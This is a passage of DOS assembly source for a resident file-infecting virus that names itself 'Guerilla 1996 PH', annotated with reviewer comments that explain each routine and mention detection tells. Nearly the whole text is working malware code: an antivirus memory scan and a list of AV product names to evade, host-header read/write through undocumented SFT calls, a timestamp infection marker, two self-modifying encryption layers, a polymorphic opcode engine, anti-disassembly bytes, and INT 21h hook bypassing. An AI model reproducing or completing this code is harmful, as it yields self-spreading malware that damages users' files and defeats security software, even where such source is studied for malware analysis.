mov ah, 52h ; undocumented
call simint21h ; -> ES:BX
push es:[bx-2]
pop ds
checkanotherMCB:
cmp byte ptr ds:[di], 'M'
jz searchMCB
cmp byte ptr ds:[di], 'Z'
jnz av_isnt_resident
searchMCB:
lea si, [bp+avtable1] ; addr[avtable1]
mov cx, numberavmem ; number of AV checks
avloop: mov ax, word ptr ds:[di+8]
cmp ax, word ptr cs:[si] ;
jnz chkmav
mov al, byte ptr cs:[si+2]
cmp al, byte ptr ds:[di+10]
jz av_is_resident
cmp al, '*' ; is wild card?
jz av_is_resident ; then found one
chkmav: add si, 3
loop avloop ; loop numberavmem times
mov ax, ds
add ax, ds:[di+3] ; goto next MCB
inc ax
mov ds, ax
jmp short checkanotherMCB
av_isnt_resident:
av_is_resident:
pop ds
pop es
ret
; -----------------------------------------------------------------------
; Get the sft
; -----------------------------------------------------------------------
; entry BX=file handle
; return ES:DI=SFT
;
; Resolves an open DOS handle to its System File Table entry through two
; undocumented INT 2Fh multiplex calls (AX=1220h, then AX=1216h); the byte
; the first call leaves at ES:DI is fed as the index (BL) to the second.
; Neither call's error indication is checked, so a bad handle leaves ES:DI
; pointing at whatever the calls returned.  Finally the word at SFT+2 is
; overwritten with 2 -- NOTE(review): presumably the SFT open-mode field,
; forced to read/write regardless of how the host opened the file; confirm
; against the DOS SFT layout for the targeted DOS version.
; Clobbers AX, DI, ES; BX is preserved.
sft:
push bx
mov ax, 1220h                  ; INT 2Fh AX=1220h: handle BX -> ES:DI (undocumented)
int 2fh
xor bx, bx
mov bl, es:[di]                ; byte at ES:DI = SFT index for this handle
mov ax, 1216h                  ; INT 2Fh AX=1216h: SFT index BX -> ES:DI = SFT entry
int 2fh
mov word ptr es:[di+2], 2      ; SFT+2 := 2 (open mode?) -- see note above
pop bx
ret
;--------------------------------------------------------------------------
; Check Drive letter
;--------------------------------------------------------------------------
; return CF=0 = not floppy
; return CF=1 = floppy
;
; Asks DOS for the current default drive (AH=19h; DOS numbers A:=0, B:=1)
; and compares AL with 2, so CF=1 exactly for drives A: and B:.  A floppy
; or removable drive mapped at C: or higher is reported as "not floppy".
; The DOS call goes through simint21h, i.e. straight to the saved INT 21h
; vector rather than via the INT 21h instruction.  Clobbers AX.
checkdrive:
mov ah, 19h                    ; DOS: get current default drive -> AL
call simint21h                 ; direct far call to the original INT 21h handler
cmp al, 2                      ; AL < 2 -> CF=1 (A: or B:)
ret
;--------------------------------------------------------------------------
; Check marker #2
;--------------------------------------------------------------------------
checkmarker:
; return ZF=1 = marker #2 set
; return ZF=0 = marker #2 not set
;
; Infection-marker test on the word at ES:DI+0Dh -- the same SFT word that
; getmins decodes as the file's packed DOS time.  The low five bits (the
; 2-second-units field of a DOS time) are isolated and XORed with 5, so ZF=1
; iff that field equals 5.  Because the marker is only a five-bit value, any
; uninfected file whose time stamp happens to carry that value is treated
; as already infected (and a detection signature can key on it).
; Clobbers AX.
mov ax, word ptr es:[di+0dh]   ; SFT+0Dh: file time (packed DOS time)
and ax, 011111b                ; keep bits 0-4 (seconds/2)
xor ax, 000101b                ; ZF=1 iff those bits == 5
ret
;--------------------------------------------------------------------------
; Read header (1ch bytes)
;--------------------------------------------------------------------------
; entry dx = addr[header]
;        (DS:DX = buffer and BX = open handle, as DOS AH=3Fh expects)
; return si = dx, so the caller can index the buffer through SI
;
; Reads 1Ch (28) bytes, four more than the 18h bytes writeheader puts back.
; Neither CF nor the byte count DOS returns in AX is checked, so a short
; read or an error leaves the buffer partly stale without any signal.
; Clobbers AX, CX, SI.
readheader:
mov ah, 3fh                    ; DOS: read CX bytes from handle BX into DS:DX
mov cx, 1ch
call simint21h                 ; via the saved INT 21h vector (bypasses INT 21h hooks)
mov si, dx                     ; SI -> header buffer
ret
;--------------------------------------------------------------------------
; Write header (18h bytes)
;--------------------------------------------------------------------------
; entry dx = addr[header]
;        (DS:DX = buffer and BX = open handle, as DOS AH=40h expects)
;
; Writes 18h (24) bytes from the buffer at DS:DX to the current file
; position of handle BX.  CF and the written-byte count in AX are not
; checked, so a partial write (e.g. disk full) goes unnoticed.
; Clobbers AX, CX.
writeheader:
mov ah, 40h                    ; DOS: write CX bytes from DS:DX to handle BX
mov cx, 18h
call simint21h                 ; via the saved INT 21h vector (bypasses INT 21h hooks)
ret
;--------------------------------------------------------------------------
; Get files minutes value
;--------------------------------------------------------------------------
; return cx=minutes
;
; Extracts the minutes field from the packed DOS file time held in the SFT
; word at ES:DI+0Dh: five single-bit shifts drop the seconds/2 field, the
; mask keeps the six minute bits (0..59).  Five `shr cx,1` instead of one
; `shr cx,5` keeps the encoding valid on an 8086 (presumably deliberate).
; Only CX is modified.
getmins:
mov cx, word ptr es:[di+0dh]   ; SFT+0Dh: file time (packed DOS time)
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1                      ; bits 5-10 now in bits 0-5
and cx, 0111111b               ; mask to the 6-bit minutes field
ret
;--------------------------------------------------------------------------
; Encrypt/Decrypt header (18h bytes)
;--------------------------------------------------------------------------
; Obfuscates the 18h-byte saved host header (origheader) in place by XORing
; every byte with one key byte: the low byte of the [time] word.  XOR with a
; constant is its own inverse, hence a single routine serves both labels.
; This is obfuscation, not cryptography: the key is a single byte stored
; right next to the data ([time]), and the plaintext (a program header) is
; highly predictable, so the original header is recoverable at a glance.
; [time] and [origheader] are referenced without a segment override or a
; delta register, so DS must be the virus' own segment and the code must
; sit at its assembled offsets (the resident copy) when this runs.
; Clobbers AX, CX; DI is preserved.
decryptheader:
encryptheader:
push di
mov ah, byte ptr [time]        ; key = low byte of the saved [time] word
lea di, [origheader]           ; 18h-byte buffer, fixed offset (no delta)
mov cx, 18h                    ; 24 bytes
h_loop: mov al, [di]
xor al, ah                     ; byte ^= key
mov [di], al
inc di
loop h_loop
pop di
ret
;--------------------------------------------------------------------------
; Move SFT file pointer to top of file
;--------------------------------------------------------------------------
; entry ES:DI = SFT entry (see sft)
;
; Rewinds the file by zeroing the 32-bit file position stored in the SFT
; itself (offsets 15h/17h) instead of issuing a DOS lseek (AH=42h), so no
; INT 21h call -- and nothing hooked on INT 21h -- observes the seek.
; No registers are modified.
movepointertotop:
mov word ptr es:[di+15h], 0    ; SFT+15h: file position, low word
mov word ptr es:[di+17h], 0    ; SFT+17h: file position, high word
ret
;--------------------------------------------------------------------------
; Polymorphic routine
;--------------------------------------------------------------------------
; entry di = addr[destination]
; si = addr[table of opcodes to use]
; bx = # of possible instruction variations (max 3)
;
; Picks one of BX equivalent 4-byte instruction sequences from the table
; at CS:SI and copies it over the 4 bytes at CS:DI (self-modifying code;
; the patch sites are the 4-byte nop/instruction slots in encrypt_decrypt
; and messup, the tables follow this routine).
;
; Variant choice: AX = polykey XOR DI, shifted right one bit at a time
; until (AX AND 3) < BX; that 2-bit value is the index.  polykey is a
; per-file word, so the same host gets the same pattern on every pass,
; while DI differs per patch site so sites can pick different variants.
; BX must be 1..3: with BX=0 the test (AX AND 3) < 0 can never hold and
; trymore spins forever once AX has shifted down to zero.  `jge` is a
; signed compare, which is fine for the 0..3 range involved.
;
; Copy: SI += index*4 (MUL CL with AL=index, CL=4).  CX is set to 5 and
; the loop is entered at its `loop` instruction, which decrements CX to 4
; before the first byte, so exactly 4 bytes are moved.  The `db 0eah` after
; the jmp is never executed: it is a far-JMP opcode placed to derail
; linear disassembly of the bytes that follow.
; All general registers, DS and ES are saved and restored; DS and ES are
; set to CS for the duration.
polymorph:
push es
push ds
push ax
push cx
push bx
push si
push di
push cs
pop ds
push cs
pop es                         ; DS = ES = CS
mov ax, polykey                ; per-file key word (fixed offset, no delta)
xor ax, di ; gives each file a unique
; polymorphic virus pattern that
; does not change
trymore:
shr ax, 1                      ; take the next bits of the key stream
mov cx, ax
and cx, 3                      ; candidate index 0..3
cmp cx, bx ; bx = # of possible instruction
jge trymore ; variations        ; retry until index < BX (never exits if BX=0)
mov ax, cx
mov cx, 4 ; 4 opcode length
mul cl                         ; AX = index * 4
add si, ax                     ; SI -> chosen 4-byte variant
mov cx, 5 ; 4 opcode length    ; 5 because `loop` decrements before the first copy
jmp jumploop
db 0eah                        ; anti-disassembly byte, skipped by the jmp above
genloop: mov al, cs:[si]
mov cs:[di], al                ; write into the code segment
inc di
inc si
jumploop: loop genloop
pop di
pop si
pop bx
pop cx
pop ax
pop ds
pop es
ret
; Opcode tables for polymorph: each entry is 4 bytes, a 12-byte table holds
; 3 variants and an 8-byte table holds 2.  All variants of one table have the
; same effect on the registers/flags the patched code depends on, so a scanner
; must match on effect rather than on a fixed byte string.  Decoded below
; (standard 16-bit encodings; tables with 66h prefixes need a 386+).
; cctable: every variant leaves CF=0 (clc clc clc nop / or ax,ax nop nop / or ax,0 nop)
cctable db 0f8h,0f8h,0f8h,90h,0bh,0c0h,90h,90h,83h,0c8h,00h,90h
; movsibptable: SI := BP (push bp; pop si; clc; clc / mov si,bp; or ax,ax / mov si,bp; or dx,dx)
movsibptable db 55h,5eh,0f8h,0f8h,8bh,0f5h,0bh,0c0h,8bh,0f5h,0bh,0d2h
; jumpctable: skip the next 2 bytes when CF=1 (nop nop jc +2 / jnc +2; jmp +2)
jumpctable db 90h,90h,72h,02h,73h,02h,0ebh,02h
; adddisitable: DI += SI (nop; add di,si; nop / clc; adc di,si; clc / nop; clc; add di,si)
adddisitable db 90h,03h,0feh,90h,0f8h,13h,0feh,0f8h,90h,0f8h,03h,0feh
; incditable: DI += 1 (inc dec inc nop / dec inc nop inc / add di,1 nop)
incditable db 47h,4fh,47h,90h,4fh,47h,90h,47h,83h,0c7h,01h,90h
; decedxtable: EDX -= 1 (nop nop dec edx / sub edx,1)
decedxtable db 90h,90h,66h,4ah,66h,83h,0eah,01h
; oredxedxtable: set ZF from EDX (or edx,edx nop / and edx,edx nop / cmp edx,0)
oredxedxtable db 66h,0bh,0d2h,90h,66h,23h,0d2h,90h,66h,83h,0fah,00h
; subbxbxtable: BX := 0 (sub bx,bx x2 / mov bx,0 nop / nop and bx,0)
subbxbxtable db 2bh,0dbh,2bh,0dbh,0bbh,00h,00h,90h,90h,83h,0e3h,00h
; movax305table: AX := 0305h (mov ah,3 mov al,5 / mov cx,0305h xchg ax,cx / mov al,5 mov ah,3)
movax305table db 0b4h,3h,0b0h,05h,0b9h,05h,03h,91h,0b0h,05h,0b4h,3h
; jumpztable: branch back when ZF=0 (jz +2; jmp -24 / jnz -22 nop nop);
; both forms land on the same target (loop1) when placed at jumpz
jumpztable db 74h,02h,0ebh,0e8h,75h,0eah,90h,90h
; movdi14table: DI := 14h (mov ax,14h xchg ax,di / mov di,14h nop / nop mov di,14h)
movdi14table db 0b8h,14h,00h,97h,0bfh,14h,00h,90h,90h,0bfh,14h,00h
; two trailing bytes that do not form a table entry (leftover? unused as far as visible)
db 25h,90h
virusname db ' Guerilla 1996 PH '            ; plaintext name string -- usable as a signature
rep_input db '$'
stealthon db 1                               ; nonzero = stealth enabled (flag read elsewhere)
numberconditions equ 11
; AV products the resident check refuses to run beside: 3-byte name prefixes,
; '*' in the third position is a wildcard (matched by the MCB walk above)
numberavmem equ 3
avtable1 db 'TB*' ; TB*  (TBSCAN family, wildcard third char)
db 'NAV' ; NA* NAVSTR
db 'NEM' ; NE* NEMESIS
; AV/tool name prefixes compared as 2-byte words; `dw 'BT'` stores the bytes
; "T","B" in memory, i.e. each literal is the prefix written backwards
numberav equ 13
avtable2: dw 'BT' ; TB* TBSCAN
dw 'IV' ; VI* VIRSTOP
dw 'VA' ; AV* AVP
dw 'AN' ; NA* NAVSTR
dw 'EN' ; NE* NEMESIS
dw 'SV' ; VS* VSHIELD OR VSAFE
dw 'IF' ; FI* FINDVIRU
dw '-F' ; F-* F-PROT
dw 'MI' ; IM* IM
dw 'VF' ; FV* FV386
dw 'CS' ; SC* SCAN
dw 'BQ' ; QB* QBASIC
dw 'VI' ; IV* IV
;------------------------------------------------------------------------
; encrypt/decrypt subroutine #2
;------------------------------------------------------------------------
; entry CF=1 -> encrypt, CF=0 -> decrypt
;       SI = delta (offset of this copy relative to its assembled offsets;
;            messup passes 0 for the resident copy)
; Inner obfuscation layer: every byte of the region testit..encrypt_decrypt2
; (testit is defined before this excerpt) has the key byte `crypt2` added
; (encrypt) or subtracted (decrypt).  The choice is made by patching the
; opcode at addorsub in place (02h = add ah,al / 2Ah = sub ah,al) -- this
; routine rewrites itself before running its own loop.  The key byte is
; embedded as the immediate of `mov al,XX` and is 0 as assembled, i.e. it
; is filled in at infection time.  A one-byte additive key with the key
; stored inside the decryptor is trivially recoverable.
; The loop is entered at its `loop` instruction, so CX is decremented before
; the first byte and the region's last byte is left untouched -- harmless,
; since encryption and decryption skip the same byte.  The `db 0eah` after
; the jmp is an anti-disassembly byte that is never executed.
; Clobbers AX, CX, DI; modifies code at CS:[SI+addorsub].
encrypt_decrypt2:
db 0b0h ; mov al, XXh          ; AL = key byte (immediate follows)
crypt2: db 0h                  ; key byte, patched in at infection time
jc encryptit2                  ; CF from caller selects direction
decryptit2:
mov byte ptr cs:[si+addorsub], 02ah ; sub   (decrypt: byte -= key)
jmp short findaddr
encryptit2:
mov byte ptr cs:[si+addorsub], 02h ; add    (encrypt: byte += key)
findaddr: mov di, offset testit
add di, si                     ; DI = start of region, delta-adjusted
mov cx, offset (encrypt_decrypt2-testit)   ; region length in bytes
jmp patch2
db 0eah                        ; anti-disassembly byte, skipped by the jmp
loop2:
mov ah, cs:[di]
addorsub: db 02h ; add ah,al or sub ah,al   ; opcode patched above
scratch2: db 0e0h              ; modrm: AH,AL
mov cs:[di], ah
inc di
patch2: loop loop2             ; entered here: processes length-1 bytes
ret
; messup: perform a DOS call (AX/CX as set by the caller, BX/DX etc. passed
; through) while the virus body is re-encrypted in memory.
; Sequence: encrypt layer 2 (encrypt_decrypt2), encrypt layer 1
; (encrypt_decrypt), make the call through the saved INT 21h vector, then
; decrypt layer 1 and layer 2 again.  SI=0 because this runs on the resident
; copy at its assembled offsets.  The effect is that while DOS -- and any
; monitor hooked on INT 21h below the saved vector -- executes, the body is
; not in plaintext, which defeats a naive memory scan triggered by the call.
; "ENCRYPTION STOPS HERE": outitend is the last byte covered by layer 1
; (encrypt_decrypt uses outitend-outit+1 as its length), so everything from
; outitend on, including this tail and the decryptor itself, stays in clear.
; The four-NOP slots at clearcarry2/clearcarry3 are 4-byte polymorph patch
; sites (cctable, every variant of which leaves CF=0); as assembled the NOPs
; do NOT clear CF, so the decrypt direction of both calls depends on the
; slots having been patched -- presumably done before the first call, but
; the patching is not visible in this excerpt.  Consequence either way: the
; DOS call's CF (its error flag) does not survive to the caller, only AX.
messup:
push ax
push cx
xor si, si                     ; delta 0: resident copy
stc
call encrypt_decrypt2          ; CF=1: encrypt layer 2
stc
call encrypt_decrypt           ; CF=1: encrypt layer 1
; -----------------------------------------------------------------------
; ENCRYPTION STOPS HERE
; -----------------------------------------------------------------------
outitend:
pop cx
pop ax                         ; restore the caller's DOS request
call simint21h                 ; original INT 21h, body encrypted meanwhile
clearcarry2: nop               ; 4-byte patch site: must leave CF=0 (cctable)
nop
nop
nop
call encrypt_decrypt           ; CF=0: decrypt layer 1
clearcarry3: nop               ; 4-byte patch site: must leave CF=0 (cctable)
nop
nop
nop
call encrypt_decrypt2          ; CF=0: decrypt layer 2
ret
;------------------------------------------------------------------------
; encrypt/decrypt subroutine #1
;------------------------------------------------------------------------
; entry CF=1 -> encrypt, CF=0 -> decrypt
;       SI = delta (0 for the resident copy)
; Outer obfuscation layer: rotates every byte of outit..outitend (inclusive;
; outit is defined before this excerpt) right by CL bits.  For encryption
; CL = `crypt`, for decryption CL = `rotdecrypt`; both immediates are 0 as
; assembled and are filled in at infection time (rotdecrypt presumably holds
; 8-crypt so the same ROR undoes the encryption -- not visible here).
; A byte-wise rotate with the count stored in the decryptor is recoverable
; by inspection; its purpose is polymorphism, not secrecy.
; Uses the .386 directive above: the loop counter is EDX (66h-prefixed
; instructions), so infected hosts crash on a 286 or older.
;
; Polymorph patch sites -- every labelled slot is exactly 4 bytes and maps
; to the same-named table after polymorph: jumpc (jumpctable), movdi14
; (movdi14table), adddisi (adddisitable), incdi (incditable), decedx
; (decedxtable), oredxedx (oredxedxtable), jumpz (jumpztable).  alorah1/
; alorah2 are single modrm bytes (25h = AH,[DI]; 05h would be AL,[DI]) and
; scratch is the rotate's modrm (0CCh = ROR AH,CL); if they are patched
; elsewhere it is not visible in this excerpt.
; As assembled the jumpc slot is four NOPs, i.e. no branch at all, so both
; directions would load CL from rotdecrypt until the slot is patched with a
; jumpctable variant (jc +2 skipping `mov cl,rotdecrypt` when CF=1).
; 14h is presumably the assembled offset of outit (the region start), since
; the length is computed from outit; confirm against the full listing.
; Control flow: `jmp short patch1` enters at the decrement, EDX starts at
; length+1, and jumpz is a backward jnz to loop1 (jumpztable variants both
; land there), so exactly length bytes are processed.  The `db 0eah` after
; the jmp is an anti-disassembly byte that never executes.
; Clobbers CX, DI, EDX, AH, flags.
.386
encrypt_decrypt:
db 0b1h ; mov cl, XXh          ; CL = encryption rotate count
crypt: db 0h                   ; patched in at infection time
jumpc: db 90h                  ; 4-byte slot for a jumpctable variant
db 90h
db 90h ; jc encryptit
db 90h
db 0b1h ; mov cl, XXh          ; CL = decryption rotate count (skipped when CF=1)
rotdecrypt: db 0h              ; patched in at infection time
encryptit:
movdi14:
mov di, 14h                    ; 4-byte slot (mov di,14h + nop): DI = region start?
nop
adddisi: add di, si            ; 4-byte slot: DI += delta
nop
nop
mov edx, offset (outitend-outit+1)   ; byte count (+1 for the entry-at-dec trick)
jmp short patch1
db 0eah                        ; anti-disassembly byte, skipped by the jmp
loop1:
db 2eh                         ; 2E 8A 25 = mov ah, cs:[di]
db 8ah
alorah1: db 25h                ; modrm: AH,[DI]
db 0d2h ; ror ah,cl            ; D2 CC = ror ah,cl
scratch: db 0cch
db 2eh                         ; 2E 88 25 = mov cs:[di], ah
db 88h
alorah2: db 25h                ; modrm: AH,[DI]
incdi: inc di                  ; 4-byte slot (inc di + 3 nops)
nop
nop
nop
patch1:
decedx: dec edx                ; 4-byte slot (66 4A + 2 nops)
nop
nop
oredxedx: cmp edx, 0           ; 4-byte slot (66 83 FA 00): ZF = (EDX == 0)
jumpz:
db 75h ; jnz loop1             ; 75 EA = jnz -22 -> loop1; 4-byte slot
db 0eah ;
db 90h
db 90h
cryptret:
ret
;--------------------------------------------------------------------------
; Original int 21h routine
;--------------------------------------------------------------------------
; Emulates `int 21h` without executing the INT instruction: PUSHF pushes the
; flags, then a hand-assembled far CALL pushes CS:IP and jumps to the vector
; stored in int21off:int21seg, so the handler's IRET returns here cleanly.
; The vector words are data embedded in the code stream and are filled in
; at runtime (they are `?` as assembled) with the INT 21h address saved when
; the virus went resident.  Every DOS request in this listing therefore
; bypasses whatever has been hooked onto INT 21h since that point (e.g. a
; resident behaviour monitor).  For detection, the 9A opcode followed by a
; runtime-patched address is itself a tell.
; Register effects are those of the DOS function called; flags are as the
; handler returns them (the caller sees CF exactly as DOS set it).
simint21h: ; Simulate interrupt 21h
pushf ; call ssss:oooo         ; flags on stack, as INT would do
callfar db 9ah ;               ; CALL FAR ptr16:16 opcode
int21off dw ? ; Offset of interrupt 21h   (patched at runtime)
int21seg dw ? ; Segment of interrupt 21h  (patched at runtime)
ret ;
; Variable area.  Everything here sits at fixed (delta-free) offsets and is
; addressed as such by encryptheader and polymorph, so it is only valid for
; the resident copy.  heap..endheap groups the per-infection scratch words;
; presumably they are not meaningful once written into a host (confirm
; against the infection routine, which is outside this excerpt).
origheader db 18h dup (?) ; read buffer   ; saved 18h-byte host header, XOR-obfuscated by encryptheader
time dw 0                                 ; file time stamp; low byte doubles as the header XOR key
date dw 0                                 ; file date stamp
heap:
sftes dw 0                                ; saved ES of the SFT entry (see sft)
sftdi dw 0                                ; saved DI of the SFT entry
sizems dw 0                               ; size, high word (presumably the host's file size)
sizels dw 0                               ; size, low word
polykey dw 0                              ; per-file key read by polymorph
header db 1ch dup (?) ; read buffer       ; 1Ch-byte buffer filled by readheader
endheap: ; end
seg_a ends
end startvirus